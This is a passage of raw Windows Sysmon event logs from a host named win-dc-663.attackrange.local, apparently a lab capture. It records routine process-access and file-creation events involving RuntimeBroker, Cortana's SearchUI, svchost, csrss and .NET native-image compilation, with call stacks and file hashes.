21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2C05-00000000CF01}6472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.421{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2C05-00000000CF01}6472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.421{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2C05-00000000CF01}6472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.405{4DB9351A-A271-60D3-2A05-00000000CF01}6776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JHSW1PYXZB\PresentationFramework.Aero2.ni.dll.auxMD5=F4D33250B4DBE324A2E640CBC60ED87C,SHA256=BED9C9223F14E8692D4E2249D4D58E02656E49465C488E6594806F6E6F24B181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.405{4DB9351A-A271-60D3-2A05-00000000CF01}6776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JHSW1PYXZB\PresentationFramework.Aero2.ni.dllMD5=34A879E394F5AC6ED636321BEE4F6A2C,SHA256=522331A6D833FB01E40DC697EA92D41E5D0AE9769DD349EAB229DC8167C20BEC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2A05-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.327{4DB9351A-9DDE-60D3-1600-00000000CF01}12921388C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2B05-00000000CF01}5460C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.327{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2B05-00000000CF01}5460C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2B05-00000000CF01}5460C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2B05-00000000CF01}5460C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2B05-00000000CF01}5460C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2B05-00000000CF01}5460C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+3dbed|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2A05-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2A05-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 10341000x800000000000000022584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.311{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 